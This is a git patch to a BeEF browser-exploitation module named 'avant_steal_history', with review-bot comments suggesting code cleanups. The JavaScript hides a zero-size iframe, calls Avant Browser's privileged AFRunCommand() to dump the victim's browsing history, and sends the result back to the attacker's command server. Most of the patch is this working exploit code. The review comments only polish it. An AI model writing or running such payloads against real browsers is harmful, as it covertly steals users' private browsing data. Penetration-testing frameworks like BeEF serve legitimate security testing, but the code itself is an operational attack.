From 7fdfcc3ef0bdac7ec0d0563e78b863c81ac86bf8 Mon Sep 17 00:00:00 2001
From: bcoles
Date: Sun, 2 Jun 2013 03:19:05 +0930
Subject: [PATCH] Add `beef.browser.isA()` to avant_steal_history module Part of issue #774
---
 .../browser/avant_steal_history/command.js | 38 +++++++++----------
 .../browser/avant_steal_history/config.yaml | 4 +-
 2 files changed, 19 insertions(+), 23 deletions(-)
diff --git a/modules/browser/avant_steal_history/command.js b/modules/browser/avant_steal_history/command.js
index 6eb89b905..faefeaf2b 100644
--- a/modules/browser/avant_steal_history/command.js
+++ b/modules/browser/avant_steal_history/command.js
@@ -15,37 +15,33 @@
 //
 beef.execute(function() {
-
+ if (!beef.browser.isA()) {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit failed. Target browser is not Avant Browser.");
+ return;
+ }
 var avant_iframe = document.createElement("iframe");
 //var avant_iframe = beef.dom.createInvisibleIframe();
- avant_iframe.setAttribute('src', "browser:home");
- avant_iframe.setAttribute('name','test2');
- avant_iframe.setAttribute('width','0');
- avant_iframe.setAttribute('heigth','0');
+ avant_iframe.setAttribute('src', 'browser:home');
+ avant_iframe.setAttribute('name', 'avant_history_<%= @command_id %>');
+ avant_iframe.setAttribute('width', '0');
+ avant_iframe.setAttribute('heigth', '0');
 avant_iframe.setAttribute('scrolling','no');
+ avant_iframe.setAttribute('style', 'display:none');
 document.body.appendChild(avant_iframe);
 var vstr = {value: ""};
- if(window['test2'].navigator) {
- //This works if FF is the rendering engine
- window['test2'].navigator.AFRunCommand(<%= @cId %>, vstr);
- beef.net.send("<%= @command_url %>", <%= @command_id %>, vstr.value);
-
+ if (window['avant_history_<%= @command_id %>'].navigator) {
+ //This works if FF is the rendering engine
+ window['avant_history_<%= @command_id %>'].navigator.AFRunCommand(<%= @cId %>, vstr);
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+vstr.value);
+ } else {
+ // this works if Chrome is the rendering engine
+ //window['avant_history_<%= @command_id %>'].AFRunCommand(60003, vstr);
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit failed. Rendering engine is not set to Firefox.");
 }
- else {
- // this works if Chrome is the rendering engine
- //window['test2'].AFRunCommand(60003, vstr);
- beef.net.send("<%= @command_url %>", <%= @command_id %>, "Exploit failed. Rendering engine is not set to Firefox");
-
- }
-
-
-
-
-
 });
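Review bot: The rewritten `avant_iframe.setAttribute('heigth', '0');` line keeps the misspelled attribute name, so it still sets nothing a browser recognises; now that this hunk adds `style` `display:none`, the line could be corrected to `'height'` or dropped together with the `width` line. The hunk also keeps, and re-edits, two commented-out statements: `//var avant_iframe = beef.dom.createInvisibleIframe();` and the `AFRunCommand(60003, vstr)` line in the `else` branch. The second sits under the comment "this works if Chrome is the rendering engine" while the branch itself reports failure, which reads as a contradiction. Replacing both with one accurate comment, for example `// Non-Firefox engine modes are not supported by this module`, would make the intent clear.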
diff --git a/modules/browser/avant_steal_history/config.yaml b/modules/browser/avant_steal_history/config.yaml
index ab161494f..bace4b5c0 100644
--- a/modules/browser/avant_steal_history/config.yaml
+++ b/modules/browser/avant_steal_history/config.yaml
@@ -19,7 +19,7 @@ beef:
 enable: true
 category: "Browser"
 name: "Get Visited URLs (Avant Browser)"
- description: "Invoke AFRunCommand() privileged function. The integer 60003 is passed by default to dump the Avant Browser history."
+ description: "This module attempts to retrieve a user's browser history by invoking the 'AFRunCommand()' privileged function.

Note: Avant Browser in Firefox engine mode only."
 authors: ["Roberto Suggi Liverani"]
 target:
- working: ["ALL"]
+ working: ["FF"]
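Review bot: `working: ["FF"]` may not line up with the runtime gate this commit adds in command.js, which checks `beef.browser.isA()` rather than a Firefox check. If the framework matches this target against the detected browser, it is worth confirming that an Avant Browser session in Firefox engine mode is classified as `FF`; otherwise the listed target and the module's own check disagree. The new description also drops the old sentence about the integer 60003 being passed by default, although command.js still passes the `cId` option to `AFRunCommand`. A short sentence such as `The command ID defaults to 60003.` would keep that option documented.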